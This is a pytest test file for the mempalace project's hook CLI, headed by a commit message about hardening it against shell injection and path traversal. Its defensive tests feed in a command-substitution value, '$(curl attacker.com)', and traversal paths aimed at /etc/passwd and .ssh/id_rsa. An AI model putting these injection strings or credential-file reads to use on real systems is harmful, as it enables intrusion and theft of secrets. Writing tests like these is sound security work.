Files
mempalace/tests/test_hooks_cli.py
T
BLUDATA\marcio.heiderscheidt 0f217f7c80 fix: harden hooks against shell injection, path traversal, and arithmetic injection
save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809
2026-04-14 07:54:42 -03:00

485 lines
15 KiB
Python

import contextlib
import io
import json
from pathlib import Path
from unittest.mock import patch
import pytest
from mempalace.hooks_cli import (
SAVE_INTERVAL,
STOP_BLOCK_REASON,
PRECOMPACT_BLOCK_REASON,
_count_human_messages,
_log,
_maybe_auto_ingest,
_parse_harness_input,
_sanitize_session_id,
_validate_transcript_path,
hook_stop,
hook_session_start,
hook_precompact,
run_hook,
)
# --- _sanitize_session_id ---
def test_sanitize_normal_id():
assert _sanitize_session_id("abc-123_XYZ") == "abc-123_XYZ"
def test_sanitize_strips_dangerous_chars():
assert _sanitize_session_id("../../etc/passwd") == "etcpasswd"
def test_sanitize_empty_returns_unknown():
assert _sanitize_session_id("") == "unknown"
assert _sanitize_session_id("!!!") == "unknown"
# --- _count_human_messages ---
def _write_transcript(path: Path, entries: list[dict]):
with open(path, "w", encoding="utf-8") as f:
for entry in entries:
f.write(json.dumps(entry) + "\n")
def test_count_human_messages_basic(tmp_path):
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[
{"message": {"role": "user", "content": "hello"}},
{"message": {"role": "assistant", "content": "hi"}},
{"message": {"role": "user", "content": "bye"}},
],
)
assert _count_human_messages(str(transcript)) == 2
def test_count_skips_command_messages(tmp_path):
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[
{"message": {"role": "user", "content": "<command-message>status</command-message>"}},
{"message": {"role": "user", "content": "real question"}},
],
)
assert _count_human_messages(str(transcript)) == 1
def test_count_handles_list_content(tmp_path):
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[
{"message": {"role": "user", "content": [{"type": "text", "text": "hello"}]}},
{
"message": {
"role": "user",
"content": [{"type": "text", "text": "<command-message>x</command-message>"}],
}
},
],
)
assert _count_human_messages(str(transcript)) == 1
def test_count_missing_file():
assert _count_human_messages("/nonexistent/path.jsonl") == 0
def test_count_empty_file(tmp_path):
transcript = tmp_path / "t.jsonl"
transcript.write_text("")
assert _count_human_messages(str(transcript)) == 0
def test_count_malformed_json_lines(tmp_path):
transcript = tmp_path / "t.jsonl"
transcript.write_text('not json\n{"message": {"role": "user", "content": "ok"}}\n')
assert _count_human_messages(str(transcript)) == 1
# --- hook_stop ---
def _capture_hook_output(hook_fn, data, harness="claude-code", state_dir=None):
"""Run a hook and capture its JSON stdout output."""
import io
buf = io.StringIO()
patches = [patch("mempalace.hooks_cli._output", side_effect=lambda d: buf.write(json.dumps(d)))]
if state_dir:
patches.append(patch("mempalace.hooks_cli.STATE_DIR", state_dir))
with contextlib.ExitStack() as stack:
for p in patches:
stack.enter_context(p)
hook_fn(data, harness)
return json.loads(buf.getvalue())
def test_stop_hook_passthrough_when_active(tmp_path):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
result = _capture_hook_output(
hook_stop,
{"session_id": "test", "stop_hook_active": True, "transcript_path": ""},
state_dir=tmp_path,
)
assert result == {}
def test_stop_hook_passthrough_when_active_string(tmp_path):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
result = _capture_hook_output(
hook_stop,
{"session_id": "test", "stop_hook_active": "true", "transcript_path": ""},
state_dir=tmp_path,
)
assert result == {}
def test_stop_hook_passthrough_below_interval(tmp_path):
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL - 1)],
)
result = _capture_hook_output(
hook_stop,
{"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
state_dir=tmp_path,
)
assert result == {}
def test_stop_hook_blocks_at_interval(tmp_path):
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
)
result = _capture_hook_output(
hook_stop,
{"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
state_dir=tmp_path,
)
assert result["decision"] == "block"
assert result["reason"] == STOP_BLOCK_REASON
def test_stop_hook_tracks_save_point(tmp_path):
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
)
data = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)}
# First call blocks
result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
assert result["decision"] == "block"
# Second call with same count passes through (already saved)
result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
assert result == {}
# --- hook_session_start ---
def test_session_start_passes_through(tmp_path):
result = _capture_hook_output(
hook_session_start,
{"session_id": "test"},
state_dir=tmp_path,
)
assert result == {}
# --- hook_precompact ---
def test_precompact_always_blocks(tmp_path):
result = _capture_hook_output(
hook_precompact,
{"session_id": "test"},
state_dir=tmp_path,
)
assert result["decision"] == "block"
assert result["reason"] == PRECOMPACT_BLOCK_REASON
# --- _log ---
def test_log_writes_to_hook_log(tmp_path):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
_log("test message")
log_path = tmp_path / "hook.log"
assert log_path.is_file()
content = log_path.read_text()
assert "test message" in content
def test_log_oserror_is_silenced(tmp_path):
"""_log should not raise if the directory cannot be created."""
with patch("mempalace.hooks_cli.STATE_DIR", Path("/nonexistent/deeply/nested/dir")):
# Should not raise
_log("this will fail silently")
# --- _maybe_auto_ingest ---
def test_maybe_auto_ingest_no_env(tmp_path):
"""Without MEMPAL_DIR set, does nothing."""
with patch.dict("os.environ", {}, clear=True):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
_maybe_auto_ingest() # should not raise
def test_maybe_auto_ingest_with_env(tmp_path):
"""With MEMPAL_DIR set to a valid directory, spawns subprocess."""
mempal_dir = tmp_path / "project"
mempal_dir.mkdir()
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
with patch("mempalace.hooks_cli.subprocess.Popen") as mock_popen:
_maybe_auto_ingest()
mock_popen.assert_called_once()
def test_maybe_auto_ingest_oserror(tmp_path):
"""OSError during subprocess spawn is silenced."""
mempal_dir = tmp_path / "project"
mempal_dir.mkdir()
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
with patch("mempalace.hooks_cli.subprocess.Popen", side_effect=OSError("fail")):
_maybe_auto_ingest() # should not raise
# --- _parse_harness_input ---
def test_parse_harness_input_unknown():
"""Unknown harness should sys.exit(1)."""
with pytest.raises(SystemExit) as exc_info:
_parse_harness_input({"session_id": "test"}, "unknown-harness")
assert exc_info.value.code == 1
def test_parse_harness_input_valid():
result = _parse_harness_input(
{"session_id": "abc-123", "stop_hook_active": True, "transcript_path": "/tmp/t.jsonl"},
"claude-code",
)
assert result["session_id"] == "abc-123"
assert result["stop_hook_active"] is True
# --- hook_stop with OSError on write ---
def test_stop_hook_oserror_on_last_save_read(tmp_path):
"""When last_save_file has invalid content, falls back to 0."""
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
)
# Write invalid content to last save file
(tmp_path / "test_last_save").write_text("not_a_number")
result = _capture_hook_output(
hook_stop,
{"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
state_dir=tmp_path,
)
assert result["decision"] == "block"
def test_stop_hook_oserror_on_write(tmp_path):
"""When write to last_save_file fails, hook still outputs correctly."""
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
)
def bad_write_text(*args, **kwargs):
raise OSError("disk full")
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
with patch.object(Path, "write_text", bad_write_text):
result = _capture_hook_output(
hook_stop,
{
"session_id": "test",
"stop_hook_active": False,
"transcript_path": str(transcript),
},
state_dir=tmp_path,
)
assert result["decision"] == "block"
# --- hook_precompact with MEMPAL_DIR ---
def test_precompact_with_mempal_dir(tmp_path):
"""Precompact runs subprocess.run when MEMPAL_DIR is set."""
mempal_dir = tmp_path / "project"
mempal_dir.mkdir()
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
with patch("mempalace.hooks_cli.subprocess.run") as mock_run:
result = _capture_hook_output(
hook_precompact,
{"session_id": "test"},
state_dir=tmp_path,
)
assert result["decision"] == "block"
mock_run.assert_called_once()
def test_precompact_with_mempal_dir_oserror(tmp_path):
"""Precompact handles OSError from subprocess gracefully."""
mempal_dir = tmp_path / "project"
mempal_dir.mkdir()
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
with patch("mempalace.hooks_cli.subprocess.run", side_effect=OSError("fail")):
result = _capture_hook_output(
hook_precompact,
{"session_id": "test"},
state_dir=tmp_path,
)
assert result["decision"] == "block"
# --- run_hook ---
def test_run_hook_dispatches_session_start(tmp_path):
"""run_hook reads stdin JSON and dispatches to correct handler."""
stdin_data = json.dumps({"session_id": "run-test"})
with patch("sys.stdin", io.StringIO(stdin_data)):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
with patch("mempalace.hooks_cli._output") as mock_output:
run_hook("session-start", "claude-code")
mock_output.assert_called_once_with({})
def test_run_hook_dispatches_stop(tmp_path):
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript, [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(3)]
)
stdin_data = json.dumps(
{
"session_id": "run-test",
"stop_hook_active": False,
"transcript_path": str(transcript),
}
)
with patch("sys.stdin", io.StringIO(stdin_data)):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
with patch("mempalace.hooks_cli._output") as mock_output:
run_hook("stop", "claude-code")
mock_output.assert_called_once_with({})
def test_run_hook_dispatches_precompact(tmp_path):
stdin_data = json.dumps({"session_id": "run-test"})
with patch("sys.stdin", io.StringIO(stdin_data)):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
with patch("mempalace.hooks_cli._output") as mock_output:
run_hook("precompact", "claude-code")
mock_output.assert_called_once()
call_args = mock_output.call_args[0][0]
assert call_args["decision"] == "block"
def test_run_hook_unknown_hook():
stdin_data = json.dumps({"session_id": "test"})
with patch("sys.stdin", io.StringIO(stdin_data)):
with pytest.raises(SystemExit) as exc_info:
run_hook("nonexistent", "claude-code")
assert exc_info.value.code == 1
def test_run_hook_invalid_json(tmp_path):
"""Invalid stdin JSON should not crash — falls back to empty dict."""
with patch("sys.stdin", io.StringIO("not valid json")):
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
with patch("mempalace.hooks_cli._output") as mock_output:
run_hook("session-start", "claude-code")
mock_output.assert_called_once_with({})
# --- Security: transcript_path validation ---
def test_validate_transcript_rejects_path_traversal():
"""Paths with '..' components should be rejected."""
assert _validate_transcript_path("../../etc/passwd") is None
assert _validate_transcript_path("../../../.ssh/id_rsa") is None
def test_validate_transcript_rejects_wrong_extension():
"""Only .jsonl and .json extensions are accepted."""
assert _validate_transcript_path("/tmp/transcript.txt") is None
assert _validate_transcript_path("/tmp/secret.py") is None
assert _validate_transcript_path("/home/user/.ssh/id_rsa") is None
def test_validate_transcript_accepts_valid_paths(tmp_path):
"""Valid .jsonl and .json paths should be accepted."""
jsonl_path = tmp_path / "session.jsonl"
jsonl_path.touch()
result = _validate_transcript_path(str(jsonl_path))
assert result is not None
assert result.suffix == ".jsonl"
json_path = tmp_path / "session.json"
json_path.touch()
result = _validate_transcript_path(str(json_path))
assert result is not None
assert result.suffix == ".json"
def test_validate_transcript_empty_string():
"""Empty transcript path should return None."""
assert _validate_transcript_path("") is None
def test_count_rejects_traversal_path():
"""_count_human_messages should return 0 for path traversal attempts."""
assert _count_human_messages("../../etc/passwd") == 0
def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
"""stop_hook_active with shell injection string should not cause issues."""
transcript = tmp_path / "t.jsonl"
_write_transcript(
transcript,
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
)
# Simulate a malicious stop_hook_active value
result = _capture_hook_output(
hook_stop,
{
"session_id": "test",
"stop_hook_active": "$(curl attacker.com)",
"transcript_path": str(transcript),
},
state_dir=tmp_path,
)
# The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
# It should count messages and block at the interval
assert result["decision"] == "block"